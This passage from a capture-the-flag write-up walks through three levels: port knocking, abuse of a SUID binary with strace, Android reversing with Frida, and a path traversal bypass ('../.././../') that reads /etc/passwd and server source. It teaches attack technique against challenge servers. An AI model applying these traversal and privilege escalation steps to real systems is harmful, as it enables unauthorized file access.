08/26/2021-19:47:30.560000 [**] [1:2009247:3] ET SHELLCODE Rothenburg Shellcode [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445
At first, I thought I had to extract the binaries sent by the malicious traffic and reverse engineer them, similar to last year's Flare-On Challenge 7. This sent me down a deep, dark rabbit hole in which I attempted to reverse engineer Meterpreter traffic and other payloads. After wasting many hours on reverse engineering, I went back to the port knocking idea. One CTF blog post suggested that I could use the Wireshark filter (tcp.flags.reset eq 1) && (tcp.flags.ack eq 1) to retrieve port knocking sequences. However, this approach failed because in the author's case, the knocked ports responded with a RST, ACK packet, whereas for this challenge the knocked ports were completely filtered.
Growing desperate, I noticed that some of the HTTP traffic contained references to the U.S. National CyberWatch Mid-Atlantic Collegiate Cyber Defense Competition (MACCDC) 2012. For example, Network Miner extracted a file named attackerHome.php that included this HTML code:
<select id='eventSelect' name='eventId'>
<option value=''>Select an Event...</option>
<option value='1' >Mid-Atlantic CCDC 2011</option>
<option value='21' >Cyberlympics - Miami</option>
<option value='30' >Mid-Atlantic CCDC 2012</option>
</select>
Following this lead, I found out that traffic captures for MACCDC 2012 were available online as PCAP files. However, for 2012 alone, the organisers released 16 different PCAP files, each several hundred MBs in size.
With no better ideas, I downloaded every single MACCDC 2012 PCAP file and manually checked each one for matching packets in traffic_capture.pcapng. After several painfully large downloads, I narrowed it down to maccdc2012_00013.pcap.
Next, I used a PCAP diffing script to extract unique packets in traffic_capture.pcapng that did not appear in maccdc2012_00013.pcap. Parsing the two massive files took about half an hour but I got my answer: traffic_capture.pcapng included extra HTTP traffic between 192.168.242.111 and 192.168.24.253.
GET /debug.txt HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 192.168.57.130:21212
Connection: Keep-Alive
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 24 Aug 2021 07:48:38 GMT
Content-type: text/plain
Content-Length: 138
Last-Modified: Tue, 24 Aug 2021 07:43:39 GMT
DEBUG PURPOSES ONLY. CLOSE AFTER USE.
++++++++
5 ports.
++++++++
Account.
++++++++
SSH.
++++++++
End debug. Check and re-enable firewall.
Two things stood out to me. Firstly, the HTTP response suggested that there were 5 ports in the port knocking sequence to open the SSH port. Secondly, the Host header 192.168.57.130:21212 did not match the HTTP server IP 192.168.24.253. Perhaps this was a hint about the ports?
I attempted multiple permutations of 192, 168, 57, 130, and 21212 using a port knocking script to no avail. After several more hours sunk into this rabbit hole, I resorted to writing my own diffing script because I realised that the previous PCAP diffing script missed out some packets.
from scapy.all import PcapReader, TCP

i = 0
with PcapReader('macccdc253.pcap') as maccdc_packets, \
     PcapReader('traffic253.pcap') as traffic_packets:
    for maccdc_packet in maccdc_packets:
        candidate_traffic_packet = traffic_packets.read_packet()
        # Advance through traffic253.pcap until the payloads line up again;
        # every skipped packet is unique to the challenge capture
        while TCP not in candidate_traffic_packet or \
              maccdc_packet[TCP].payload != candidate_traffic_packet[TCP].payload:
            print("NOMATCH {}".format(i))
            candidate_traffic_packet = traffic_packets.read_packet()
            i += 1
        i += 1
This new script revealed that there were indeed more unique packets. These turned out to be a series of TCP SYN packets from 192.168.202.95 to 192.168.24.253, followed by an SSH connection!
Even better, the [PSH, ACK] packet sent from the server after the port knocking sequence contained SSH credentials.
This was my ticket. I repeated the port knocking sequence with python .\knock.py <IP ADDRESS> 2928 12852 48293 9930 8283 42069 and received the packet containing the SSH credentials. The credentials only lasted for a few seconds and changed on each iteration; I probably should have automated the SSH login, but manually copying and pasting worked as well.
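knock.py itself isn't reproduced here, but the core of any port knocking client is just a timed connect attempt to each port in sequence (a minimal sketch; a TCP connect() emits the SYN the knock daemon watches for, and against filtered ports each attempt simply times out):

```python
import socket

def knock(host, ports, timeout=0.3):
    # Hit each port in order; we only care that the SYN goes out,
    # so timeouts and refused connections are expected and ignored
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except (socket.timeout, OSError):
            pass
        finally:
            s.close()
```

Something like knock("128.199.211.243", [2928, 12852, 48293, 9930, 8283, 42069]) would then replay the observed sequence.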
I logged in as the low-privileged challenjour user. The home folder contained an otpkey executable and secret.txt. secret.txt could only be read by root, but otpkey had the SUID bit set so it could read secret.txt.
I pulled otpkey from the server and decompiled it in IDA. I annotated the pseudocode accordingly:
__int64 __fastcall main(int a1, char **a2, char **a3)
{
  int i; // eax
  const char *encrypted_machine_id_hex; // rax
  int can_open_dest_file; // [rsp+18h] [rbp-78h]
  char *dest_file; // [rsp+20h] [rbp-70h]
  char *source_file_bytes; // [rsp+28h] [rbp-68h]
  char *dest_file_bytes; // [rsp+30h] [rbp-60h]
  char *tmp_otk_file; // [rsp+38h] [rbp-58h]
  const char *source_file; // [rsp+40h] [rbp-50h]
  _BYTE *encrypted_machine_id; // [rsp+48h] [rbp-48h]
  char tmp_otk_dir[16]; // [rsp+50h] [rbp-40h] BYREF
  __int64 v14; // [rsp+60h] [rbp-30h]
  __int64 v15; // [rsp+68h] [rbp-28h]
  __int64 v16; // [rsp+70h] [rbp-20h]
  __int16 v17; // [rsp+78h] [rbp-18h]
  unsigned __int64 v18; // [rsp+88h] [rbp-8h]

  v18 = __readfsqword(0x28u);
  can_open_dest_file = 0;
  dest_file = 0LL;
  source_file_bytes = 0LL;
  dest_file_bytes = 0LL;
  tmp_otk_file = 0LL;
  strcpy(tmp_otk_dir, "/tmp/otk/");
  v14 = 0LL;
  v15 = 0LL;
  v16 = 0LL;
  v17 = 0;
  for ( i = getopt(a1, a2, "hm"); ; i = getopt(a1, a2, "hm") )
  {
    if ( i == -1 )
    {
      if ( a1 == 4 )
        return 0LL;
    }
    else
    {
      if ( i != 109 )                           // 'm' so opt is h instead
      {
        printf("Usage: %s [OPTIONS]\n", *a2);
        puts("Print some text :)n");
        puts("Options");
        puts("=======");
        puts("[-m] curr_location new_location \tMove a file from curr location to new location\n");
        exit(0);
      }
      if ( a1 != 4 )
      {
        puts("[-m] curr_location new_location \tMove file from curr location to new location");
        exit(0);
      }
      source_file = a2[2];
      dest_file = a2[3];
      printf("Requested to move %s to %s.\n", source_file, dest_file);
      if ( (unsigned int)is_alpha(source_file) && (unsigned int)is_alpha(dest_file) )
      {
        if ( (unsigned int)check_needle(source_file) )  // check if source file has 'secret.t'
          can_open_dest_file = can_open(dest_file);
        if ( can_open_dest_file )
        {
          source_file_bytes = (char *)read_bytes(source_file);
          dest_file_bytes = (char *)read_bytes(dest_file);
          if ( source_file_bytes && dest_file_bytes )
            write_bytes_to_file(dest_file, source_file_bytes);
        }
        else
        {
          source_file_bytes = (char *)read_bytes(source_file);
          if ( source_file_bytes )
          {
            write_bytes_to_file(dest_file, source_file_bytes);
            chmod(dest_file, 0x180u);
          }
        }
      }
    }
    encrypted_machine_id = encrypt_machine_id();
    if ( encrypted_machine_id )
    {
      encrypted_machine_id_hex = (const char *)bytes_to_hex(encrypted_machine_id);
      strncat(tmp_otk_dir, encrypted_machine_id_hex, 0x20uLL);  // appends encrypted machine id to /tmp/otk/
      tmp_otk_file = (char *)read_bytes(tmp_otk_dir);
      if ( tmp_otk_file )
        printf("%s", tmp_otk_file);
    }
    else
    {
      puts("An error occurred.");
    }
    free_wrapper(encrypted_machine_id);
    free_wrapper(tmp_otk_file);
    if ( !can_open_dest_file )
      break;
    write_bytes_to_file(dest_file, dest_file_bytes); // restores dest file...
    free_wrapper(source_file_bytes);
    free_wrapper(dest_file_bytes);
    dest_file = 0LL;
  }
  return 0LL;
}
otpkey moved a file from arg1 to arg2. If arg1 was secret.txt, the program wrote the contents of secret.txt to the destination file, but before exiting it would also restore the destination file's original contents, preventing me from reading the flag. The section starting from encrypted_machine_id = encrypt_machine_id(); looked more interesting. It attempted to read /tmp/otk/<encrypt_machine_id()> and print the contents of the file. Since this occurred before it restored the destination file, I could theoretically write secret.txt to the OTK file and print its contents to get the flag!
What string did encrypt_machine_id generate?
_BYTE *encrypt_machine_id()
{
  size_t v0; // rax
  size_t ciphertext_len; // rax
  int i; // [rsp+0h] [rbp-80h]
  void *machine_id; // [rsp+8h] [rbp-78h]
  time_t current_time_reduced; // [rsp+10h] [rbp-70h]
  char *_etc_machine_id; // [rsp+18h] [rbp-68h]
  _BYTE *machine_id_unhexed; // [rsp+20h] [rbp-60h]
  _BYTE *encrypted_machine_id; // [rsp+28h] [rbp-58h]
  char *ciphertext; // [rsp+38h] [rbp-48h]
  char plaintext[8]; // [rsp+46h] [rbp-3Ah] BYREF
  __int16 v11; // [rsp+4Eh] [rbp-32h]
  __int64 v12[2]; // [rsp+50h] [rbp-30h] BYREF
  __int64 md5_hash[4]; // [rsp+60h] [rbp-20h] BYREF

  md5_hash[3] = __readfsqword(0x28u);
  *(_QWORD *)plaintext = 0LL;
  v11 = 0;
  v12[0] = 0x13111D5F1304155FLL;
  v12[1] = 0x14195D151E1918LL;
  encrypted_machine_id = calloc(0x10uLL, 1uLL);
  md5_hash[0] = 0LL;
  md5_hash[1] = 0LL;
  current_time_reduced = time(0LL) / 10;
  snprintf(plaintext, 0xAuLL, "%ld", current_time_reduced);
  v0 = strlen(plaintext);
  ciphertext = (char *)calloc(4 * v0, 1uLL);
  RC4("O).2@g", plaintext, ciphertext);
  strlen(plaintext);
  ciphertext_len = strlen(ciphertext);
  MD5(ciphertext, ciphertext_len, md5_hash);
  free_wrapper(ciphertext);
  _etc_machine_id = xor_0x70((const char *)v12);  // xor_0x70 decodes the "/etc/machine-id" path
  machine_id = read_bytes(_etc_machine_id);       // fb60706a312b4ddab835445d28153227
  free_wrapper(_etc_machine_id);
  if ( !machine_id )
    return 0LL;
  machine_id_unhexed = (_BYTE *)read_hex_string(machine_id);
  if ( !machine_id_unhexed || !encrypted_machine_id )
    return 0LL;
  for ( i = 0; i <= 15; ++i )
    encrypted_machine_id[i] = machine_id_unhexed[i] ^ *((_BYTE *)md5_hash + i);  // xor with each byte of weak md5_hash
  free_wrapper(machine_id_unhexed);
  return encrypted_machine_id;
}
By following the pseudocode, I deduced that the function generated the one-time key using XOR(MD5(RC4("O).2@g", str(time(0) / 10))), machine-id). Since it divided time(0) by 10, each one-time key lasted for ten seconds.
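A Python reconstruction of the routine looks something like this. Treat it as a sketch of the algorithm rather than a verified keygen: my own regeneration attempts never matched the server, possibly because the binary measures the RC4 ciphertext with strlen(), silently truncating it at the first null byte (modelled below).

```python
import hashlib

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling followed by the pseudo-random generation loop."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def otk_name(machine_id_hex: str, now: int) -> str:
    """Mirror encrypt_machine_id(): MD5(RC4(str(now // 10))) XOR machine-id."""
    ciphertext = rc4(b"O).2@g", str(now // 10).encode())
    ciphertext = ciphertext.split(b"\x00")[0]  # the binary uses strlen() on the ciphertext
    digest = hashlib.md5(ciphertext).digest()
    machine_id = bytes.fromhex(machine_id_hex)
    return bytes(m ^ d for m, d in zip(machine_id[:16], digest)).hex()
```

The ten-second validity window falls out of the integer division: any two timestamps in the same window produce the same name.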
At first, I tried generating the one-time key myself, but the output did not match anything in /tmp/otk. After several more failed attempts, I realised that I could simply use strace to dynamically read otpkey's system calls. When otpkey attempted to read /tmp/otk/<encrypt_machine_id()>, strace traced the system call and printed its file path argument.
Since the server had already installed strace, I crafted a Bash one-liner to do this: dest=$(strace ./otpkey -m secret.txt /tmp/ptl 2>&1 | grep /tmp/otk | cut -c 19-59);./otpkey -m secret.txt $dest. With that, I solved the challenge.
TISC{v3RY|53CrE+f|@G}
Level 7: The Secret
Domains: Steganography, Android Security, Cryptography
Our investigators have recovered this email sent out by an exposed PALINDROME hacker, alias: Natasha. It looks like some form of covert communication between her and PALINDROME.
Decipher the communications channel between them quickly to uncover the hidden message, before it is too late.
Submit your flag in the format: TISC{flag found}.
Bye for now.eml
Bye for now.eml
contained the following text:
GIB,
I=E2=80=99ll be away for a while. Don=E2=80=99t miss me. You have my pictur=
e :D
Hope the distance between us could help me see life from a different
perspective. Sometimes, you will find the most valuable things hidden in
the least significant places.
Natasha
My hex editor revealed a large base64 string appended as an HTML comment. Decoding the string produced a PNG image of Natasha Romanoff from the Avengers. Based on the “least significant places” hint from the email message, I suspected that the image embedded data using least-significant-bit steganography. I confirmed this with stegsolve, as the plane 0 filters displayed the tell-tale “static” at the top of the image.
I used the StegOnline tool to retrieve the bytes, which formed the string https://transfer.ttyusb.dev/8S8P76hlG6yEig2ywKOiC6QMak4iGaKc/data.zip.
The link downloaded a password-protected ZIP file containing an app.apk file. The ZIP file included an extra comment at the bottom: LOBOBMEM MULEBES ULUD RIKIF GNIKCARC EROFEB NIAGA KNIHT. I reversed the string and got THINK AGAIN BEFORE CRACKING FIKIR DULU SEBELUM MEMBOBOL.
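Undoing the reversal is a one-liner in Python:

```python
comment = "LOBOBMEM MULEBES ULUD RIKIF GNIKCARC EROFEB NIAGA KNIHT"
print(comment[::-1])  # THINK AGAIN BEFORE CRACKING FIKIR DULU SEBELUM MEMBOBOL
```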
Despite such fine advice, I responded in a predictable manner:
After wasting several hours trying to guess and crack the password, I came across a useful CTF guide that revealed that ZIPs could be pseudo-encrypted by setting the encryption flag without actually encrypting the data. I modified the corresponding byte in my hex editor and lo and behold, I opened the ZIP without a password!
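Instead of patching the byte by hand, the fix can also be scripted. Here is a sketch that walks the ZIP signatures and clears bit 0 (the encryption flag) of every general-purpose flag field; it is a naive signature scan, fine for a small archive but capable of false positives if file data happens to contain a header magic:

```python
import struct

def clear_zip_encryption_flags(data: bytes) -> bytes:
    """Clear bit 0 of the general-purpose flag in every local file header
    (PK\\x03\\x04, flags at offset +6) and central directory entry
    (PK\\x01\\x02, flags at offset +8)."""
    buf = bytearray(data)
    for sig, flag_off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = buf.find(sig)
        while pos != -1:
            off = pos + flag_off
            flags = struct.unpack_from("<H", buf, off)[0]
            struct.pack_into("<H", buf, off, flags & ~0x1)
            pos = buf.find(sig, pos + 1)
    return bytes(buf)
```

With the flag bits cleared, standard tools open the pseudo-encrypted archive without asking for a password.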
I installed the APK on my test Android phone and opened it.
Clicking “I'M IN POSITION” caused the application to close because the time, latitude, longitude, and data were invalid.
I decompiled the APK with jadx and noticed that the MainActivity function initialised the Myth class, which then executed System.loadLibrary("native-lib"). This corresponded with libnative-lib.so in the APK's lib folder, so I decompiled it in IDA. The library exported two interesting functions: Java_mobi_thesecret_Myth_getTruth and Java_mobi_thesecret_Myth_getNextPlace.
Java_mobi_thesecret_Myth_getTruth performed a large number of _mm_shuffle_epi32 decryption routines before returning some plaintext which I suspected was the flag. It also verified that the second argument matched GIB's phone:
v7 = (const char *)(*(int (__cdecl **)(int *, int, char *))(*a4 + 676))(a4, a7, &v74);
v8 = strcmp(v7, "GIB's phone") == 0;
Meanwhile, Java_mobi_thesecret_Myth_getNextPlace checked latitude and longitude values:
if ( *(double *)&a5 > 103.7899 || *(double *)&a4 < 1.285 || *(double *)&a4 > 1.299 || *(double *)&a5 < 103.78 )
{
  v10 = (*(int (__cdecl **)(int, const char *))(*(_DWORD *)a1 + 668))(a1, "Error: Not near. Try again.");
}
It also compared the second argument to a matching time value:
if ( v7 == 22 && v8 > 30 || v7 == 23 && v8 < 15 )
{
  std::string::append((int)v20, (int)&all, 71, 1u);
  std::string::append((int)v20, (int)&all, 83, 1u);
  std::string::append((int)v20, (int)&all, 83, 1u);
  std::string::append((int)v20, (int)&all, 79, 1u);
  std::string::append((int)v20, (int)&all, 82, 1u);
  std::string::append((int)v20, (int)&all, 25, 1u);
  std::string::append((int)v20, (int)&all, 14, 1u);
  std::string::append((int)v20, (int)&all, 14, 1u);
  std::string::append((int)v20, (int)&all, 83, 1u);
  std::string::append((int)v20, (int)&all, 13, 1u);
  std::string::append((int)v20, (int)&all, 76, 1u);
  std::string::append((int)v20, (int)&all, 68, 1u);
  std::string::append((int)v20, (int)&all, 14, 1u);
  std::string::append((int)v20, (int)&all, 47, 1u);
  std::string::append((int)v20, (int)&all, 32, 1u);
  std::string::append((int)v20, (int)&all, 43, 1u);
  std::string::append((int)v20, (int)&all, 40, 1u);
  std::string::append((int)v20, (int)&all, 45, 1u);
  std::string::append((int)v20, (int)&all, 35, 1u);
  std::string::append((int)v20, (int)&all, 49, 1u);
  std::string::append((int)v20, (int)&all, 46, 1u);
  std::string::append((int)v20, (int)&all, 44, 1u);
  std::string::append((int)v20, (int)&all, 36, 1u);
  std::string::append((int)v20, (int)&all, 50, 1u);
  std::string::append((int)v20, (int)&all, 83, 1u);
  std::string::append((int)v20, (int)&all, 64, 1u);
  std::string::append((int)v20, (int)&all, 75, 1u);
  std::string::append((int)v20, (int)&all, 74, 1u);
  std::string::append((int)v20, (int)&all, 68, 1u);
  std::string::append((int)v20, (int)&all, 81, 1u);
  if ( (v20[0] & 1) != 0 )
    v9 = (char *)v21;
  else
    v9 = (char *)v20 + 1;
  v11 = (*(int (__cdecl **)(int, char *))(*(_DWORD *)a1 + 668))(a1, v9);
}
else
{
  v11 = (*(int (__cdecl **)(int, const char *))(*(_DWORD *)a1 + 668))(a1, "Error: Wrong time. Try again.");
}
Next, I grepped through the decompiled Java code and found that getTruth and getNextPlace were called in f/a/b.java:
q.a(new g(0, "http://worldtimeapi.org/api/timezone/Etc/UTC", null, new c(mainActivity, textView), new f(textView)));
String str2 = mainActivity.u;
boolean z = true;
if (!(str2 == null || str2.length() == 0)) {
    String nextPlace = mainActivity.y.getNextPlace(mainActivity.u, mainActivity.s, mainActivity.t);
    mainActivity.v = nextPlace;
    if (nextPlace == null || nextPlace.length() == 0) {
        mainActivity.x();
    } else {
        if (c.b.a.b.a.H(mainActivity.v, "Error", false, 2)) {
            mainActivity.x();
            context = mainActivity.getApplicationContext();
            str = mainActivity.v;
        } else {
            p q2 = f.q(mainActivity);
            View findViewById4 = mainActivity.findViewById(R.id.data_text);
            c.c(findViewById4, "findViewById(R.id.data_text)");
            TextView textView2 = (TextView) findViewById4;
            q2.a(new k(0, mainActivity.v, new g(mainActivity, textView2), new e(textView2)));
            String str3 = mainActivity.w;
            if (!(str3 == null || str3.length() == 0) || mainActivity.x != 0) {
                int i2 = mainActivity.x;
                if (i2 == 1) {
                    View findViewById5 = mainActivity.findViewById(R.id.flag_value);
                    c.c(findViewById5, "findViewById(R.id.flag_value)");
                    TextView textView3 = (TextView) findViewById5;
                    String string = Settings.Global.getString(mainActivity.getContentResolver(), "device_name");
                    if (!(string == null || string.length() == 0)) {
                        z = false;
                    }
                    if (z) {
                        string = Settings.Global.getString(mainActivity.getContentResolver(), "bluetooth_name");
                    }
                    Myth myth = mainActivity.y;
                    String str4 = mainActivity.w;
                    c.c(string, "user");
                    String truth = myth.getTruth(str4, string);
                    if (c.b.a.b.a.H(truth, "Error", false, 2)) {
                        Toast.makeText(mainActivity.getApplicationContext(), truth, 0).show();
                        return;
                    } else {
                        textView3.setText(truth);
                        return;
                    }
By tracing back variables using the jadx GUI “Find Usage” option, I reconstructed the flow of the application. mainActivity.y.getNextPlace took in the current timestamp from http://worldtimeapi.org/api/timezone/Etc/UTC (parsed to HH:MM) and the latitude and longitude, returning a link. After that, the application called myth.getTruth with str4 and the current username as arguments. Since the IDA decompilation already revealed that the user value needed to be GIB's phone, I only needed to find out the expected value of str4.
The decompiled Java code showed that String str4 = mainActivity.w; and mainActivity.w was set in f/a/g.java by the a function:
public final void a(Object obj) {
    MainActivity mainActivity = this.a;
    TextView textView = this.f2157b;
    String str = (String) obj;
    int i = MainActivity.q;
    c.d(mainActivity, "this$0");
    c.d(textView, "$dataTextView");
    try {
        c.c(str, "response");
        int e2 = e.e(str, "tgme_page_description", 0, true, 2);
        String str2 = (String) e.g(str.subSequence(e2, e.b(str, "</div>", e2, true)), new String[]{">"}, false, 0, 6).get(1);
        mainActivity.w = str2;
        textView.setText(str2);
        mainActivity.x = 1;
    } catch (Exception unused) {
        mainActivity.x = -1;
    }
}
I looked up tgme_page_description and learned that this was the HTML class for the description text in a Telegram group page.
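The decompiled parsing logic is easy to mirror in Python. A sketch against a hypothetical page snippet (only the class name and the split-on-'>' behaviour come from the decompiled code):

```python
def extract_description(html: str) -> str:
    """Mimic the decompiled Java: take the substring from the class name
    to the closing </div>, then keep whatever follows the first '>'."""
    start = html.index("tgme_page_description")
    end = html.index("</div>", start)
    return html[start:end].split(">")[1]

# extract_description('<div class="tgme_page_description">HELLO</div>') -> 'HELLO'
```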
I moved on to dynamic instrumentation with Frida and wrote a quick script to trigger getNextPlace directly in the application with the correct arguments.
function exploit() {
    // Check if Frida has located the JNI
    if (Java.available) {
        // Switch to the Java context
        Java.perform(function () {
            const Myth = Java.use('mobi.thesecret.Myth');
            var myth = Myth.$new();
            var string_class = Java.use("java.lang.String");
            var out = string_class.$new("");
            var timestamp = string_class.$new("22:31");
            out = myth.getNextPlace(timestamp, 1.286, 103.785);
            console.log(out);
        });
    }
}
I executed this script via my connected computer with frida -U 'The Secret' -l exploit.js. To my pleasant surprise, getNextPlace returned a Telegram link: https://t.me/PALINDROMEStalker. The description box displayed the string I was looking for: ESZHUUSHCAJGKOBPHFAMVYUIFHFYFTVQKGFGZPNUBV.
Now all I had to do was to feed getTruth the correct arguments.
function exploit() {
    // Check if Frida has located the JNI
    if (Java.available) {
        // Switch to the Java context
        Java.perform(function () {
            const Myth = Java.use('mobi.thesecret.Myth');
            var myth = Myth.$new();
            var string_class = Java.use("java.lang.String");
            var out = string_class.$new("");
            var timestamp = string_class.$new("22:31");
            var tele_description = string_class.$new("ESZHUUSHCAJGKOBPHFAMVYUIFHFYFTVQKGFGZPNUBV");
            var user = string_class.$new("GIB's phone");
            out = myth.getNextPlace(timestamp, 1.286, 103.785);
            console.log(out);
            out = myth.getTruth(tele_description, user);
            console.log(out);
        });
    }
}
The script printed the flag and completed this challenge.
TISC{YELENAFOUNDAWAYINSHEISOUREYESANDEARSWITHIN}
Level 8: Get-Shwifty
Domains: Web, Reverse Engineering, Pwn
We have managed to track down one of PALINDROME's recruitment operations!
Our intel suggest that they have defaced our website and insert their own recruitment test.
Pass their test and get us further into their organization!
We are counting on you!
The following links are mirrors of each other, flags are the same:
http://tisc21c-v3clxv6ecfdrvyrzn5mz7mchv8v7wcpv.ctf.sg:42651
http://tisc21c-8pz0kdhumzaj1lthraa6tm6t27righ8y.ctf.sg:42651
http://tisc21c-wwhvyoobqg08oegfsdvnmcflgfsbx0xd.ctf.sg:42651
NOTE: THE CHALLENGE DOES NOT INVOLVE EXTERNAL LINKS THAT MAY OR MAY NOT BE FOUND IN THE PROVIDED WEBSITE.
I finally reached the Elite Three. From this point onwards, the difficulty ratcheted up greatly and each level took significant effort to crack. I groaned internally when I saw that Level 8 was a Pwn challenge: while I understood the basics of Windows binary exploitation, I lacked confidence in Linux exploitation and had never completed a Pwn CTF challenge before. Nevertheless, this was the only thing standing in the way of the first $10k.
I opened the link to the hacked website.
I inspected the HTML source code and noticed a commented-out Find out more about the PALINDROME link. The link redirected to /hint/?hash=aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d which contained a single picture.
What other hint hash had I found...? I began fuzzing the hash query parameter and noticed that hash=./aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d returned the same picture. This suggested a file traversal vulnerability. However, attempting to go straight to ../../../../etc/passwd failed. I worked incrementally by traversing backwards one directory at a time and discovered that the application blacklisted three consecutive traversals (../../../). To bypass this, I simply used ../.././../, which successfully allowed me to access any file on the server! The page returned the file data as a base64-encoded image source.
<!DOCTYPE html>
<html lang="en">
<head>
<title>lol</title>
</head>
<body>
<img src='data:image/png;base64,<BASE64 ENCODED FILE DATA>'>
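The leak is easy to automate. A sketch of two helpers: one builds a traversal string that never contains three consecutive ../ hops (the filter behaviour is as I observed it), and one decodes the data-URI in the returned page; the hop count and regex are assumptions for illustration:

```python
import base64
import re

def traversal_payload(path: str, hops: int = 6) -> str:
    """Build a traversal string with no '../../../' substring by
    inserting a harmless './' after every second hop."""
    parts = []
    for i in range(hops):
        parts.append("../")
        if i % 2 == 1:
            parts.append("./")
    return "".join(parts) + path.lstrip("/")

def extract_file(html: str) -> bytes:
    """Pull the base64 payload out of the data-URI <img> tag."""
    match = re.search(r"base64,([A-Za-z0-9+/=]*)'", html)
    return base64.b64decode(match.group(1))
```

For example, traversal_payload("/etc/passwd") yields ../.././../.././../.././etc/passwd, which slips past the blacklist.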
Unfortunately, I did not find any interesting information in /etc/passwd or /etc/hosts. Eventually, I decided to check the source code of the website's pages, which turned out to be PHP. I struck gold with /var/www/html/hint/index.php:
<!DOCTYPE html>
<html lang="en">
<head>
    <title>lol</title>
</head>
<body>
<?php
if($_GET["hash"]){
    echo "<img src='data:image/png;base64,".base64_encode(file_get_contents($_GET["hash"]))."'>";
    die();
}else{
    header("Location: /hint?hash=aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d");
    die();
}
// to the furure me: this is the old directory listing
//
// hint:
// total 512
// drwxrwxr-x 2 user user   4096 Jun 16 21:52 ./
// drwxr-xr-x 5 user user   4096 Jun 16 21:11 ../
// -rw-rw-r-- 1 user user     18 Jun 16 22:12 68a64066b1f37468f5191d627473891ac0ef9243
// -rw-rw-r-- 1 user user 489519 Jun 16 15:47 aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d
// -rw-rw-r-- 1 user user  15710 Jun 16 21:52 b5dbffb4375997bfcba86c4cd67d74c7aef2b14e
// -rw-r--r-- 1 user user    551 Jun 16 21:30 index.php
?>
</body>
</html>
Following the directory listing, I accessed two new files.
68a64066b1f37468f5191d627473891ac0ef9243 was a text file that said i am also on 53619.
b5dbffb4375997bfcba86c4cd67d74c7aef2b14e contained another directory listing.
bin:
total 28
-rwsrwxr-x 1 root root 22752 Aug 19 15:59 1adb53a4b156cef3bf91c933d2255ef30720c34f
I proceeded to leak /var/www/html/bin/1adb53a4b156cef3bf91c933d2255ef30720c34f, which turned out to be an ELF executable.
As described in the text file earlier, this binary ran on port 53619 on the server. I executed it locally and was greeted by a large alien head.
___
. -^ `--,
/# =========`-_
/# (--====___====\
/# .- --. . --.|
/## | * ) ( * ),
|## \ /\ \ / |
|### --- \ --- |
|#### ___) #|
|###### ##|
\##### ---------- /
\#### (
`\### |
\### |
\## |
\###. .)
`======/
SHOW ME WHAT YOU GOT!!!
////////////// MENU //////////////
// 0. Help //
// 1. Do Sanity Test //
// 2. Get Recruited //
// 3. Exit Program //
//////////////////////////////////
The “Do Sanity Test” option prompted me for input.
To pass the sanity test, you just need to give a sane answer to show that you are not insane!
Your answer:
After entering some random text, I tried the “Get Recruited” option. However, the application printed the error message You must be insane! Complete the Sanity Test to prove your sanity first!.
To figure out what was going on, I decompiled the application in IDA and annotated the pseudocode for the “Do Sanity Test” option.
__int64 sanity_test()
{
  void *v0; // rsp
  void *v1; // rsp
  void *v2; // rsp
  int v4; // [rsp+14h] [rbp-24h] BYREF
  void *s; // [rsp+18h] [rbp-20h]
  void *src; // [rsp+20h] [rbp-18h]
  void *dest; // [rsp+28h] [rbp-10h]
  unsigned __int64 v8; // [rsp+30h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  ++dword_5580E5357280;
  v4 = 32;
  v0 = alloca(48LL);
  s = (void *)(16 * (((unsigned __int64)&v4 + 3) >> 4));
  v1 = alloca(48LL);
  src = s;
  v2 = alloca(48LL);
  dest = s;
  memset(s, 0, v4);
  memset(src, 0, v4);
  memset(dest, 0, v4);
  std::operator>><char,std::char_traits<char>>(&std::cin, src);
  memcpy(dest, src, v4);
  memcpy(s, dest, v4 / 2);
  sanity_test_input = malloc(v4 - 1);
  memcpy(sanity_test_input, s, v4 - 1);
  sanity_test_result = *((_BYTE *)s + v4 - 1);
  return 0LL;
}
Following a series of three suspicious memcpys, the function set sanity_test_result to the 32nd byte of the input. Next, the “Get Recruited” function checked if sanity_test_result && !(unsigned __int8)shl_sanity_test_result_7(). In other words, to pass the sanity test, I had to enter input such that sanity_test_result != 0 and (unsigned __int8)(sanity_test_result << 7) == 0. I could pass this check rather easily with an even number, such as 0x40 (@ in ASCII). Now, instead of displaying an error message, the “Get Recruited” option prompted me for a different set of inputs.
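A quick enumeration confirms which input bytes satisfy both conditions — exactly the non-zero even values:

```python
def passes_sanity(b: int) -> bool:
    # sanity_test_result must be non-zero, and (result << 7) must truncate
    # to zero in 8 bits, i.e. the lowest bit of the byte must be clear
    return b != 0 and (b << 7) & 0xFF == 0

valid = [b for b in range(256) if passes_sanity(b)]
assert 0x40 in valid                   # '@' works
assert all(b % 2 == 0 for b in valid)  # every valid byte is even
```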
To get recruited, you need to provide the correct passphrase for the Cromulon.
Passphrase: AAA
Your passphrase appears to be incorrect.
You are allowed a few tries to modify your passphrase.
Use the following functions to provide the correct answer to get recruited.
1. Append String
2. Replace Appended String
3. Modify Appended String
4. Show what you have for the Cromulon currently
5. Submit
6. Back
The various options looked ripe for some kind of use-after-free vulnerability... except that there were not a lot of frees going on. The binary handled the appended strings using a linked list, and I could not find any issues in the memory management. I also suspected that it suffered from a format string bug because entering %x%x%x for the passphrase caused the “Show what you have for the Cromulon currently” option to print e8e8e8e8. However, after further reverse engineering, I realised I had misunderstood the source of the strange output. It turned out that when appending, replacing, or modifying a string, the user's input would be XORed with the input from the sanity test before it was stored in the linked list. For example, since I entered a series of @s for the sanity test, "%x" XOR "@@" == "e8".
